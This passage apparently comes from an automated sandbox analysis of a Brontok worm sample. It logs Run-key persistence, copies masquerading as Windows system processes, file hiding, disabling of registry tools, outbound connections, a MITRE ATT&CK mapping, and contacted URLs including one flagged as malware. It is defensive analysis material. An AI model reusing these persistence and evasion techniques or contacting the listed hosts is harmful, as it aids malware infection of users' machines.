                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus

                  Hooking and other Techniques for Hiding and Protection

                  Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2636).png
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeWindow / User API: foregroundWindowGot 425
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 172.67.70.191 443
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.94.10.34 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 72.14.178.174 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.130.204.160 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.2 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.3 443
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\lsass.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
MITRE ATT&CK matrix (techniques listed per tactic; a leading number is the report's per-technique count)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Windows Service; 1 Scheduled Task/Job; 1 Scripting; 411 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; RC Scripts
Privilege Escalation: 1 Windows Service; 11 Process Injection; 1 Scheduled Task/Job; 411 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; RC Scripts
Defense Evasion: 221 Masquerading; 1 Disable or Modify Tools; 11 Process Injection; 1 Hidden Files and Directories; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Application Window Discovery; 11 Peripheral Device Discovery; 3 File and Directory Discovery; 12 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 2 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Destruction; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
Pedang @ P#U00ecsau.exe | 100% | ReversingLabs | Win32.Worm.Brontok |
Pedang @ P#U00ecsau.exe | 96% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif | 100% | Avira | TR/Brontok.Q |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.debuging.com/WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F | 0% | Avira URL Cloud | safe |
http://www.17tahun.com/? | 0% | Avira URL Cloud | safe |
http://www.20mbweb.com/Kids/dbrotlu/Host18.css | 0% | Avira URL Cloud | safe |
http://www.20mbweb.com/Kids/dbrotlu/Bron-IDUTSPLD.css | 0% | Avira URL Cloud | safe |
http://www.kaskus.com/? | 0% | Avira URL Cloud | safe |
http://www.fajarweb.com/? | 100% | Avira URL Cloud | malware |
http://www.20mbweb.com/Kids/dbrotlu/IN18.css | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 172.217.18.14 | true | false | | high
hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com | 3.130.204.160 | true | true | | unknown
